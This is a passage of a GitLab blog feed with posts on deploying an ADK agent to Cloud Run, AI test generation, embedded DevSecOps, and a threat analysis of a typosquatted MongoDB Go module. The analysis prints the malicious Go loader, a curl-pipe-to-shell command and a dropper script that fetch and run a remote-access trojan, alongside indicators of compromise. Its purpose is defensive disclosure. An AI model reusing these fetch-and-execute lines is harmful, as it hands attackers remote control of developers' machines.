efficiently can be challenging. In this tutorial, you'll learn how to deploy
an AI agent built with Google's Agent Development Kit
(<a href="https://cloud.google.com/vertex-ai/generative-ai/docs/agent-development-kit/quickstart">ADK</a>)
to Cloud Run using <a href="https://cloud.google.com/blog/topics/partners/understand-the-google-cloud-gitlab-integration">GitLab's native
integrations</a>
and <a href="https://docs.gitlab.com/ci/components/">CI/CD components</a>.</p>
<h2>What are AI agents and why do they matter?</h2>
<p>Agentic AI represents a significant evolution in artificial intelligence. Unlike traditional generative AI tools that require constant human direction, AI agents leverage advanced language models and natural language processing to take independent action. These systems can understand requests, make decisions, and execute multistep plans to achieve goals autonomously.</p>
<p>This tutorial uses Google's ADK, a flexible and modular framework for developing and deploying AI agents. While optimized for Gemini and the Google ecosystem, ADK is model-agnostic, deployment-agnostic, and built for compatibility with other frameworks.</p>
<h2>Our demo application: Canada City Advisor</h2>
<p>To demonstrate the deployment process, we'll work with a practical example: the Canada City Advisor. This AI agent helps users find their ideal Canadian city based on their preferences and constraints.</p>
<p>Here's how it works:</p>
<ul>
<li>
<p>Users input their budget requirements and lifestyle preferences.</p>
</li>
<li>
<p>The root agent coordinates two sub-agents:</p>
<ul>
<li>A budget analyzer agent that evaluates financial constraints. This draws data obtained from the Canada Mortgage and Housing Corporation.</li>
<li>A lifestyle preferences agent that matches cities to user needs. This includes a weather service that uses <a href="https://open-meteo.com/">Open-Meteo</a> to get the proper city information.</li>
</ul>
</li>
<li>
<p>The system generates personalized city recommendations</p>
</li>
</ul>
<p>This multi-agent architecture showcases the power of agentic AI - different specialized agents working together to solve a complex problem. The sub-agents are only invoked when the root agent determines that budget and lifestyle analysis are needed.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1751576568/obgxpxvlnxtzifddrrz1.png" alt="Multi-agent architecture to develop demo application with agentic AI"></p>
<h2>Prerequisites</h2>
<p>Before we begin, ensure you have:</p>
<ul>
<li>
<p>A Google Cloud project with the following APIs enabled:</p>
<ul>
<li>Cloud Run API</li>
<li>Artifact Registry API</li>
<li>Vertex AI API</li>
</ul>
</li>
<li>
<p>A GitLab project for your source code</p>
</li>
<li>
<p>Appropriate permissions in both GitLab and Google Cloud</p>
</li>
</ul>
<p><strong>Step 1: Set up IAM integration with Workload Identity Federation</strong></p>
<p>The first step establishes secure, keyless authentication between GitLab and Google Cloud using <a href="https://cloud.google.com/iam/docs/workload-identity-federation">Workload Identity Federation</a>. This eliminates the need for service account keys and improves security.</p>
<p>In your GitLab project:</p>
<ol>
<li>
<p>Navigate to <strong>Settings &gt; Integrations &gt; Google Cloud IAM.</strong></p>
</li>
<li>
<p>Provide the following information:</p>
<ul>
<li><strong>Project ID</strong>: Your Google Cloud project ID</li>
<li><strong>Project Number</strong>: Found in your Google Cloud console</li>
<li><strong>Pool ID</strong>: A unique identifier for your workload identity pool</li>
<li><strong>Provider ID</strong>: A unique identifier for your identity provider</li>
</ul>
</li>
</ol>
<p>GitLab will generate a script for you. Copy this script and run it in your Google Cloud Shell to create the Workload Identity Federation.</p>
<p><strong>Step 2: Configure Google Artifact Registry integration</strong></p>
<p>Next, we'll set up the connection to Google Artifact Registry where our container images will be stored.</p>
<ol>
<li>
<p>In GitLab, go to <strong>Settings &gt; Integrations &gt; Google Artifact Registry.</strong></p>
</li>
<li>
<p>Enter:</p>
<ul>
<li><strong>Google Cloud Project ID</strong>: Same as in Step 1</li>
<li><strong>Repository Name</strong>: Name of an existing Artifact Registry repository</li>
<li><strong>Location</strong>: The region where your repository is located</li>
</ul>
</li>
</ol>
<p><strong>Important</strong>: The repository must already exist in Artifact Registry. GitLab won't create a new one for you in this context.</p>
<p>GitLab will generate commands to set up the necessary permissions. Run these in Google Cloud Shell.</p>
<p>Additionally, add these roles to your service principal for Cloud Run deployment:</p>
<ul>
<li>
<p><code>roles/run.admin</code></p>
</li>
<li>
<p><code>roles/iam.serviceAccountUser</code></p>
</li>
<li>
<p><code>roles/cloudbuild.builds.editor</code></p>
</li>
</ul>
<p>You can add these roles using the following gcloud commands:</p>
<pre><code class="language-shell">
GCP_PROJECT_ID=&quot;&lt;your-project-id&gt;&quot; #replace

GCP_PROJECT_NUMBER=&quot;&lt;your-project-number&gt;&quot; #replace

GCP_WORKLOAD_IDENTITY_POOL=&quot;&lt;your-pool-id&gt;&quot; #replace


gcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \
  --member=&quot;principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true&quot; \
  --role='roles/run.admin'

gcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \
  --member=&quot;principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true&quot; \
  --role='roles/iam.serviceAccountUser'

gcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \
  --member=&quot;principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true&quot; \
  --role='roles/cloudbuild.builds.editor'
</code></pre>
<p><strong>Step 3: Create the CI/CD pipeline</strong></p>
<p>Now for the exciting part – let's build our deployment pipeline! GitLab's CI/CD components make this remarkably simple.</p>
<p>Create a <code>.gitlab-ci.yml</code> file in your project root:</p>
<pre><code class="language-unset">
stages:
  - build
  - test
  - upload
  - deploy

variables:
  GITLAB_IMAGE: $CI_REGISTRY_IMAGE/main:$CI_COMMIT_SHORT_SHA
  AR_IMAGE: $GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_LOCATION-docker.pkg.dev/$GOOGLE_ARTIFACT_REGISTRY_PROJECT_ID/$GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_NAME/main:$CI_COMMIT_SHORT_SHA

build:
  image: docker:24.0.5
  stage: build
  services:
    - docker:24.0.5-dind
  before_script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
  script:
    - docker build -t $GITLAB_IMAGE .
    - docker push $GITLAB_IMAGE

include:
  - template: Jobs/Dependency-Scanning.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/Dependency-Scanning.gitlab-ci.yml
  - template: Jobs/SAST.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/SAST.gitlab-ci.yml
  - template: Jobs/Secret-Detection.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/Secret-Detection.gitlab-ci.yml
  - component: gitlab.com/google-gitlab-components/artifact-registry/upload-artifact-registry@main
    inputs:
      stage: upload
      source: $GITLAB_IMAGE
      target: $AR_IMAGE
  - component: gitlab.com/google-gitlab-components/cloud-run/deploy-cloud-run@main
    inputs:
      stage: deploy
      project_id: &quot;&lt;your-project-id&gt;&quot; #replace
      service: &quot;canadian-city&quot;
      region: &quot;us-central1&quot;
      image: $AR_IMAGE
</code></pre>
<p>The pipeline consists of four stages:</p>
<ol>
<li>
<p><strong>Build</strong>: Creates the Docker container with your AI agent</p>
</li>
<li>
<p><strong>Test</strong>: Runs security scans (container scanning, dependency scanning, SAST)</p>
</li>
<li>
<p><strong>Upload</strong>: Pushes the container to Artifact Registry</p>
</li>
<li>
<p><strong>Deploy</strong>: Deploys to Cloud Run</p>
</li>
</ol>
<p>The great thing about using <a href="https://docs.gitlab.com/ci/components/">GitLab's CI/CD components</a> is that you only need to provide a few parameters - the components handle all the complex authentication and deployment logic.</p>
<p><strong>Step 4: Deploy and test</strong></p>
<p>With everything configured, it's time to deploy:</p>
<ol>
<li>
<p>Commit your code and <code>.gitlab-ci.yml</code> to your GitLab repository.</p>
</li>
<li>
<p>The pipeline will automatically trigger.</p>
</li>
<li>
<p>Monitor the pipeline progress in GitLab's CI/CD interface.</p>
</li>
<li>
<p>Once complete, find your Cloud Run URL in the Google Cloud Console.</p>
</li>
</ol>
<p>You'll see each stage execute:</p>
<ul>
<li>
<p>Build stage creates your container.</p>
</li>
<li>
<p>Test stage runs comprehensive security scans.</p>
</li>
<li>
<p>Upload stage pushes to Artifact Registry.</p>
</li>
<li>
<p>Deploy stage creates or updates your Cloud Run service.</p>
</li>
</ul>
<h2>Security benefits</h2>
<p>This approach provides several security advantages:</p>
<ul>
<li>
<p><strong>No long-lived credentials:</strong> Workload Identity Federation eliminates service account keys.</p>
</li>
<li>
<p><strong>Automated security scanning:</strong> Every deployment is scanned for vulnerabilities.</p>
</li>
<li>
<p><strong>Audit trail:</strong> Complete visibility of who deployed what and when.</p>
</li>
<li>
<p><strong>Principle of least privilege:</strong> Fine-grained IAM roles limit access.</p>
</li>
</ul>
<h2>Summary</h2>
<p>By combining GitLab's security features with Google Cloud's powerful AI and serverless platforms, you can deploy AI agents that are both secure and scalable. The integration between GitLab and Google Cloud eliminates much of the complexity traditionally associated with such deployments.</p>
<blockquote>
<p>Use this tutorial's <a href="https://gitlab.com/gitlab-partners-public/google-cloud/demos/ai-agent-deployment">complete code
example</a>
to get started now. Not a GitLab customer yet? Explore the DevSecOps platform with <a href="https://about.gitlab.com/free-trial/">a free trial</a>.</p>
</blockquote>
]]></content>
        <author>
            <name>Regnard Raquedan</name>
            <uri>https://about.gitlab.com/blog/authors/regnard-raquedan</uri>
        </author>
        <published>2025-07-07T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Enhance application quality with AI-powered test generation]]></title>
        <id>https://about.gitlab.com/blog/enhance-application-quality-with-ai-powered-test-generation/</id>
        <link href="https://about.gitlab.com/blog/enhance-application-quality-with-ai-powered-test-generation/"/>
        <updated>2025-07-03T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>You know how critical application quality is to your customers and reputation. However, ensuring that quality through comprehensive testing can feel like an uphill battle. You're dealing with time-consuming manual processes, inconsistent test coverage across your team, and those pesky issues that somehow slip through the cracks. It's frustrating when your rating drops because quality assurance becomes a bottleneck rather than a safeguard.</p>
<p>Here's where <a href="https://about.gitlab.com/blog/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/">GitLab Duo with Amazon Q </a>, which delivers agentic AI throughout the software development lifecycle for AWS customers, can help transform your QA process. This AI-powered capability can automatically generate comprehensive unit tests for your code, dramatically accelerating your quality assurance workflow. Instead of spending hours writing tests manually, you can let AI analyze your code and create tests that ensure optimal coverage and consistent quality across your entire application.</p>
<h2>How GitLab Duo with Amazon Q works</h2>
<p>So how does this work? Let's walk through the process together.
When you're working on a new feature, you start by selecting the Java class you've added to your project through a merge request. You simply navigate to your merge request and click on the &quot;Changes&quot; tab to see the new code you've added.</p>
<p>Next, you invoke Amazon Q by entering a quick action command. All you need to do is type <code>/q test</code> in the issue comment box. It's that simple – just a forward slash, the letter &quot;q&quot;, and the word &quot;test&quot;.</p>
<p>Once you hit enter, Amazon Q springs into action. It analyzes your selected code, understanding its structure, logic, and purpose. The AI examines your class methods, dependencies, and potential edge cases to determine what tests are needed.</p>
<p>Within moments, Amazon Q generates comprehensive unit test coverage for your new class. It creates tests that cover not just the happy path, but also edge cases and error conditions you might have overlooked. The generated tests follow your project's existing patterns and conventions, ensuring they integrate seamlessly with your codebase.</p>
<h2>Why use GitLab Duo with Amazon Q?</h2>
<p>Here's the bottom line: You started with a critical challenge – maintaining high-quality applications while dealing with time constraints and inconsistent testing practices. GitLab Duo with Amazon Q addresses this by automating the test generation process, ensuring optimal code coverage and consistent testing standards. The result? Issues are detected before deployment, your applications maintain their quality, and you can develop software faster without sacrificing reliability.</p>
<p>Key benefits of this feature:</p>
<ul>
<li>Significantly reduces time spent writing unit tests</li>
<li>Ensures comprehensive test coverage across your codebase</li>
<li>Maintains consistent testing quality across all team members</li>
<li>Catches issues before they reach production</li>
<li>Accelerates your overall development velocity</li>
</ul>
<p>Ready to see this game-changing feature in action? Watch how GitLab Duo with Amazon Q can transform your quality assurance process:</p>
<p>&lt;!-- blank line --&gt;</p>
<p>&lt;figure class=&quot;video_container&quot;&gt;
&lt;iframe src=&quot;https://www.youtube.com/embed/pxlYJVcHY28?si=MhIz6lnHxc6kFhlL&quot; frameborder=&quot;0&quot; allowfullscreen=&quot;true&quot;&gt; &lt;/iframe&gt;
&lt;/figure&gt;
&lt;!-- blank line --&gt;</p>
<h2>Get started with GitLab Duo with Amazon Q today</h2>
<p>Want to learn more about GitLab Duo with Amazon Q? Visit the <a href="https://about.gitlab.com/partners/technology-partners/aws/">GitLab and AWS partner page</a> for detailed information.</p>
<h2>Agentic AI resources</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/agentic-ai-guides-and-resources/">Agentic AI guides and resources</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/">What is agentic AI?</a></li>
<li><a href="https://about.gitlab.com/blog/2025/04/17/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/">GitLab Duo with Amazon Q: Agentic AI optimized for AWS generally available</a></li>
<li><a href="https://docs.gitlab.com/user/duo_amazon_q/">GitLab Duo with Amazon Q documentation</a></li>
</ul>
]]></content>
        <author>
            <name>Cesar Saavedra</name>
            <uri>https://about.gitlab.com/blog/authors/cesar-saavedra</uri>
        </author>
        <published>2025-07-03T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Why now is the time for embedded DevSecOps]]></title>
        <id>https://about.gitlab.com/blog/why-now-is-the-time-for-embedded-devsecops/</id>
        <link href="https://about.gitlab.com/blog/why-now-is-the-time-for-embedded-devsecops/"/>
        <updated>2025-07-01T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>For embedded systems teams, DevSecOps has traditionally seemed like an approach better suited to SaaS applications than firmware development. But this is changing. Software is now a primary differentiator in hardware products. New market expectations demand modern development practices. In response, organizations are pursuing &quot;embedded DevSecOps.&quot;</p>
<p>What is embedded DevSecOps? The application of collaborative engineering practices, integrated toolchains, and automation for building, testing, and securing software to embedded systems development. Embedded DevSecOps includes necessary adaptations for hardware integration.</p>
<h2>Convergence of market forces</h2>
<p>Three powerful market forces are converging to compel embedded teams to modernize their development practices.</p>
<h3>1. The software-defined product revolution</h3>
<p>Products once defined primarily by their hardware are now differentiated by their software capabilities. The software-defined vehicle (SDV) market tells a compelling story in this regard. It's projected to grow from $213.5 billion in 2024 to <a href="https://www.marketsandmarkets.com/Market-Reports/software-defined-vehicles-market-187205966.html">$1.24 trillion</a> by 2030, a massive 34% compound annual growth rate.
The software content in these products is growing considerably. By the end of 2025, the average vehicle is expected to contain <a href="https://www.statista.com/statistics/1370978/automotive-software-average-lines-of-codes-per-vehicle-globally/">650 million lines of code</a>. Traditional embedded development approaches cannot handle this level of software complexity.</p>
<h3>2. Hardware virtualization as a technical enabler</h3>
<p>Hardware virtualization is a key technical enabler of embedded DevSecOps. Virtual electronic control units (vECUs), cloud-based ARM CPUs, and sophisticated simulation environments are becoming more prevalent. Virtual hardware allows testing that once required physical hardware.</p>
<p>These virtualization technologies provide a foundation for continuous integration (<a href="https://about.gitlab.com/topics/ci-cd/">CI</a>). But their value is fully realized only when integrated into an automated workflow. Combined with collaborative development practices and automated pipelines, virtual testing helps teams detect issues much earlier, when fixes are far less expensive. Without embedded DevSecOps practices and tooling to orchestrate these virtual resources, organizations can't capitalize on the virtualization trend.</p>
<h3>3. The competitive and economic reality</h3>
<p>Three interrelated forces are reshaping the competitive landscape for embedded development:</p>
<ul>
<li>The talent war has shifted decisively. As an embedded systems leader at a GitLab customer explained, “No embedded engineers graduating from college today know legacy tools like Perforce. They know Git. These young engineers will work at a company for six months on legacy tools, then quit.” Companies using outdated tools may lose their engineering future.</li>
<li>This talent advantage translates into competitive superiority. Tech-forward companies that attract top engineers with modern practices achieve remarkable results. For example, in 2024, <a href="https://spacenews.com/spacex-launch-surge-helps-set-new-global-launch-record-in-2024/">SpaceX</a> performed more orbital launches than the rest of the world combined. Tech-forward companies excel at software development and embrace a modern development culture. This, among other things, creates efficiencies that legacy companies struggle to match.</li>
<li>The rising costs of embedded development — driven by long feedback cycles — create an urgent need for embedded DevSecOps. When developers have to wait weeks to test code on hardware test benches, productivity remains inherently low. Engineers lose context and must switch contexts when results arrive. The problem worsens when defects enter the picture. Bugs become more expensive to fix the later they're discovered. Long feedback cycles magnify this problem in embedded systems.</li>
</ul>
<p>Organizations are adopting embedded DevSecOps to help combat these challenges.</p>
<h2>Priority transformation areas</h2>
<p>Based on these market forces, forward-thinking embedded systems leaders are implementing embedded DevSecOps in the following ways.</p>
<h3>From hardware bottlenecks to continuous testing</h3>
<p>Hardware-testing bottlenecks represent one of the most significant constraints in traditional embedded development. These delays create the unfavorable economics described earlier — when developers wait weeks for hardware access, defect costs spiral.
Addressing this challenge requires a multifaceted approach including:</p>
<ul>
<li>Automating the orchestration of expensive shared hardware test benches among embedded developers</li>
<li>Integrating both SIL (Software-in-the-Loop) and HIL (Hardware-in-the-Loop) testing into automated CI pipelines</li>
<li>Standardizing builds with version-controlled environments</li>
</ul>
<p>Embedded developers can accomplish this with GitLab's <a href="https://gitlab.com/gitlab-accelerates-embedded/comp/device-cloud">On-Premises Device Cloud</a>, a CI/CD component. Through automating the orchestration of firmware tests on virtual and real hardware, teams are better positioned to reduce feedback cycles from weeks to hours. They also can catch more bugs early on in the software development lifecycle.</p>
<h3>Automating compliance and security governance</h3>
<p>Embedded systems face strict regulatory requirements. Manual compliance processes are unsustainable.
Leading organizations are transforming how they comply with these requirements by:</p>
<ul>
<li>Replacing manual workflows with automated <a href="https://about.gitlab.com/blog/introducing-custom-compliance-frameworks-in-gitlab/">compliance frameworks</a></li>
<li>Integrating specialized functional safety, security, and code quality tools into automated continuous integration pipelines</li>
<li>Automating approval workflows, enforcing code reviews, and maintaining audit trails</li>
<li>Configuring compliance frameworks for specific standards like ISO 26262 or DO-178C</li>
</ul>
<p>This approach enables greater compliance maturity without additional headcount — turning what was once a burden into a competitive advantage. One leading electric vehicle (EV) manufacturer executes 120,000 CI/CD jobs per day with GitLab, many of which include compliance checks. And they can fix and deploy bug fixes to vehicles within an hour of discovery. This level of scale and speed would be extremely difficult without automated compliance workflows.</p>
<h3>Enabling collaborative innovation</h3>
<p>Historically, for valid business and technical reasons, embedded developers have largely worked alone at their desks. Collaboration has been limited. Innovative organizations break down these barriers by enabling shared code visibility through integrated source control and CI/CD workflows. These modern practices attract and retain engineers while unlocking innovation that would remain hidden in isolated workflows.
As one director of DevOps at a tech-forward automotive manufacturer (a GitLab customer) explains: &quot;It's really critical for us to have a single pane of glass that we can look at and see the statuses. The developers, when they bring a merge request, are aware of the status of a given workflow in order to move as fast as possible.&quot; This transparency accelerates innovation, enabling automakers to rapidly iterate on software features that differentiate their vehicles in an increasingly competitive market.</p>
<h2>The window of opportunity</h2>
<p>Embedded systems leaders have a clear window of opportunity to gain a competitive advantage through DevSecOps adoption. But the window won't stay open forever. Software continues to become the primary differentiator in embedded products, and the gap between leaders and laggards will only widen.
Organizations that successfully adopt DevSecOps will reduce costs, accelerate time-to-market, and unlock innovation that differentiates them in the market. The embedded systems leaders of tomorrow are the ones embracing DevSecOps today.</p>
<blockquote>
<p>While this article explored why now is the critical time for embedded teams to adopt DevSecOps, you may be wondering about the practical steps to get started. Learn how to put these concepts into action with our guide: <a href="https://about.gitlab.com/blog/4-ways-to-accelerate-embedded-development-with-gitlab/">4 ways to accelerate embedded development with GitLab</a>.</p>
</blockquote>
]]></content>
        <author>
            <name>Matt DeLaney</name>
            <uri>https://about.gitlab.com/blog/authors/matt-delaney</uri>
        </author>
        <published>2025-07-01T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[GitLab catches MongoDB Go module supply chain attack]]></title>
        <id>https://about.gitlab.com/blog/gitlab-catches-mongodb-go-module-supply-chain-attack/</id>
        <link href="https://about.gitlab.com/blog/gitlab-catches-mongodb-go-module-supply-chain-attack/"/>
        <updated>2025-06-30T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Software supply chain attacks via malicious dependencies continue to be one of the most significant security threats to modern software development. The widespread use of open source components has enabled development teams to build applications rapidly, but it has also widened the attack surface area. The growing ecosystem of third-party packages presents numerous opportunities for attackers to exploit dependencies through techniques like typosquatting, dependency confusion, and package impersonation, making it increasingly challenging for developers to distinguish legitimate packages from malicious imposters.</p>
<p>To address this challenge, GitLab's Vulnerability Research team recently developed an automated detection system designed to proactively identify malicious dependencies in software supply chains. The system combines multiple detection techniques that work in concert:</p>
<ul>
<li>Automated typosquatting detection, which identifies suspicious naming patterns</li>
<li>Semantic code analysis, which flags potentially malicious behaviors like network requests or command executions</li>
<li>AI-assisted initial screening for advanced payload and obfuscation detection</li>
</ul>
<p>This multi-layered approach is used by the vulnerability research team to continuously scan newly published dependencies across major ecosystems, providing early warning of supply chain attacks.</p>
<p>Using this detection system, GitLab recently identified a live typosquatting attack in the wild that leveraged a malicious MongoDB Go module. Below are details on the attack and how GitLab works to keep supply chains safe.</p>
<h2>Executive summary: A MongoDB module that's not quite right</h2>
<p>Our detection system flagged a newly published Go module called <code>github.com/qiniiu/qmgo</code>, closely mimicking the popular <a href="https://www.mongodb.com/">MongoDB</a> module <code>github.com/qiniu/qmgo</code>. The legitimate module describes itself as &quot;The Go driver for MongoDB&quot; and has gained traction in the Go community.</p>
<p>To disguise the malicious module as legitimate, the threat actor used a GitHub username nearly identical to the one associated with the real module with one subtle change: they added one “i” (<code>qiniu</code> → <code>qiniiu</code>). To the casual observer scrolling through search results or auto-complete suggestions, this difference would be very easy to overlook.</p>
<p>The new module’s code was a working copy of the legitimate <code>qmgo</code> module. However, malicious code was inserted into the <code>NewClient</code> function in <code>client.go</code>, a function that developers would naturally call when initializing their MongoDB connection. Concealing malicious code within a function made the payload less likely to be executed during potential runtime security analysis, while ensuring that it would execute from normal usage in real applications.</p>
<p>After reporting the malicious module, it was removed within approximately 19 hours of our initial report. However, the threat actor quickly adapted, publishing a second typosquatted version (<code>github.com/qiiniu/qmgo</code>) just four days later with identical malicious code. This follow-up attack was also detected and taken down roughly one hour after initial discovery. The rapid redeployment demonstrates the persistent nature of these attacks and highlights why proactive detection is crucial in minimizing exposure windows.</p>
<h2>Technical deep dive: Peeling back the layers</h2>
<p>The threat actor took steps to hide the attack. The malicious payload used a multilayered approach, starting with a compact code snippet that triggered a chain of remote payload downloads:</p>
<pre><code class="language-go">txt, err := script.Get(&quot;https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html&quot;).String()  
if err == nil {  
    txt2, err := script.Get(string(strings.Replace(txt, &quot;\n&quot;, &quot;&quot;, -1))).String()  
    if err == nil {  
        exec.Command(&quot;/bin/sh&quot;, &quot;-c&quot;, string(txt2)).Start()  
    }  
}  
</code></pre>
<p>The attack unfolds in four distinct layers:</p>
<p><strong>Layer 1:</strong> The code fetches <code>update.html</code> from another repository owned by the typosquat account <code>qiiniu/vue-element-admin</code>. The file contained a single line:</p>
<pre><code>https://img.googlex.cloud/seed.php
</code></pre>
<p><strong>Layer 2:</strong> The code then fetches <code>https://img.googlex.cloud/seed.php</code>, which returns a single shell command, which is executed:</p>
<pre><code class="language-bash">curl -s http://207.148.110.29:80/logon61.gif|sh
</code></pre>
<p><strong>Layer 3:</strong> The command tells the system to fetch <code>http://207.148.110.29:80/logon61.gif</code> using curl and execute the response as a shell script.  The shell script downloads what appears to be an MP3 file (<code>chainelli.mp3</code>) to <code>/tmp/vod</code>, makes it executable, runs it, and immediately deletes it:</p>
<pre><code class="language-bash">#!/bin/sh  
rm -rf /tmp/vod  
curl -s http://207.148.110.29:80/chainelli.mp3 -o /tmp/vod  
chmod 777 /tmp/vod  
/tmp/vod  
rm -rf /tmp/vod  
</code></pre>
<p><strong>Layer 4:</strong> The <code>chainelli.mp3</code> file is actually a statically-linked, stripped ELF Go binary designed to establish persistent remote access. Once executed, the malware attempts to connect to its command and control server at <code>ellipal.spoolsv.cyou</code> on Port 443 (both TCP and UDP), using a custom encrypted communication protocol with a hardcoded RSA key. From there, it provides the threat actor with remote administration capabilities:</p>
<ul>
<li>Complete remote shell access and one-off command execution</li>
<li>Screenshot captures</li>
<li>SOCKS proxy functionality to make connections through the compromised machine</li>
<li>Configurable sleep interval between check-ins with the command and control server to avoid detection</li>
<li>Standard remote access trojan features like filesystem browsing and upload/download</li>
</ul>
<h2>They're back (already)</h2>
<p>Just four days after GitLab reported the initial malicious module and saw it removed, <code>github.com/qiiniu/qmgo</code> appeared – the second typosquatted version with identical malicious code. This quick redeployment demonstrates the persistent nature of these attacks and highlights how threat actors adapt quickly to takedown efforts.</p>
<h2>GitLab’s approach: Finding needles in haystacks</h2>
<p>The initial discovery and persistence of this attack validated our approach to proactive dependency monitoring and threat detection. GitLab’s detection system combines multiple techniques to identify malicious dependencies:</p>
<p><strong>Typosquatting detection:</strong> GitLab monitors newly published dependencies and looks for packages that exhibit signs of various typosquatting strategies.</p>
<p><strong>Semantic heuristics:</strong> Our system statically analyzes code for patterns like network requests, command executions, and other behaviors typical of malicious payloads.</p>
<p><strong>AI-assisted analysis:</strong> A <a href="https://about.gitlab.com/blog/what-is-a-large-language-model-llm/">large language model</a> does the initial analysis of the suspicious parts of the code to help us weed out obvious false positives, detect complex payloads, and identify obfuscation techniques used to hide malicious intent.</p>
<p><strong>Human review:</strong> A human receives an alert to verify the finding and to perform advanced analysis.</p>
<h2>Recommendations: Staying ahead of persistent supply chain threats</h2>
<p>This attack highlights the ongoing challenges in securing software supply chains. The multilayered obfuscation and rapid redeployment after takedown demonstrate that threat actors are willing to invest significant effort in targeting popular dependencies.</p>
<p>The quick pivot to new typosquatted packages after our initial report highlights a fundamental weakness in the current ecosystems: package managers typically only remove malicious dependencies after they've been published, discovered, and reported by the community. This reactive approach leaves a dangerous window where developers can unknowingly consume compromised packages. Proactive monitoring and detection systems like the one GitLab has developed can help close this gap by identifying threats during the publication process itself.</p>
<p>We've provided indicators of compromise (IOCs) in the next section, which you can use in your monitoring systems to detect this specific campaign.</p>
<h2>Indicators of compromise</h2>
<table>
<thead>
<tr>
<th style="text-align:left">IOC</th>
<th style="text-align:left">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left"><code>github.com/qiniiu/qmgo</code></td>
<td style="text-align:left">Malicious Go module</td>
</tr>
<tr>
<td style="text-align:left"><code>github.com/qiiniu/qmgo</code></td>
<td style="text-align:left">Malicious Go module</td>
</tr>
<tr>
<td style="text-align:left"><code>https://raw.githubusercontent.com/qiniiu/vue-element-admin/refs/heads/main/public/update.html</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>https://img.googlex.cloud/seed.php</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>http://207.148.110.29:80/logon61.gif</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>http://207.148.110.29:80/chainelli.mp3</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>img.googlex.cloud</code></td>
<td style="text-align:left">Payload delivery host</td>
</tr>
<tr>
<td style="text-align:left"><code>207.148.110.29</code></td>
<td style="text-align:left">Payload delivery host</td>
</tr>
<tr>
<td style="text-align:left"><code>ellipal.spoolsv.cyou</code></td>
<td style="text-align:left">Command &amp; Control host</td>
</tr>
<tr>
<td style="text-align:left"><code>6ada952c592f286692c59028c5e0fc3fa589759f</code></td>
<td style="text-align:left">SHA-1 checksum of chainelli.mp3 remote administration malware</td>
</tr>
<tr>
<td style="text-align:left"><code>8ae533e2d1d89c871908cbcf5c7d89c433d09b2e7f7d4ade3aef46c55b66509c</code></td>
<td style="text-align:left">SHA-256 checksum of chainelli.mp3 remote administration malware</td>
</tr>
<tr>
<td style="text-align:left"><code>/tmp/vod</code></td>
<td style="text-align:left">Temporary download location of chainelli.mp3 remote administration malware</td>
</tr>
</tbody>
</table>
<h2>How GitLab helps secure the software supply chain</h2>
<p>Malicious dependencies, like the MongoDB Go module attack, highlight why securing the software supply chain requires more than just CVE monitoring. GitLab’s DevSecOps platform includes <a href="https://docs.gitlab.com/user/application_security/secure_your_application/">Application Security Testing</a> scanners like Software Composition Analysis in the development lifecycle, helping teams catch vulnerable or malicious packages before they reach production.</p>
<p>Paired with research efforts like this, GitLab aims to enable developers to build applications that are secure from the start without compromising on development velocity.</p>
<h2>Timeline</h2>
<ul>
<li><strong>2025-06-01T09:31:</strong> GitLab reports <code>github.com/qiniiu/qmgo</code> to Go Security</li>
<li><strong>2025-06-01T09:43:</strong> GitLab reports <code>github.com/qiniiu/qmgo</code> to GitHub</li>
<li><strong>2025-06-01T10:14:</strong> GitLab reports <code>ellipal.spoolsv.cyou</code> (<code>188.166.213.194</code>) to the IP block owner</li>
<li><strong>2025-06-02T04:03:</strong> Go Security takes down <code>github.com/qiniiu/qmgo</code></li>
<li><strong>2025-06-02T09:57:</strong> The IP block owner suspends <code>188.166.213.194</code></li>
<li><strong>2025-06-03T09:15:</strong> GitHub suspends <code>github.com/qiniiu</code></li>
<li><strong>2025-06-05T17:15:</strong> GitLab reports <code>github.com/qiiniu/qmgo</code> to Go Security</li>
<li><strong>2025-06-05T17:33:</strong> GitLab reports <code>github.com/qiiniu/qmgo</code> to GitHub</li>
<li><strong>2025-06-05T17:45:</strong> Go Security takes down <code>github.com/qiiniu/qmgo</code></li>
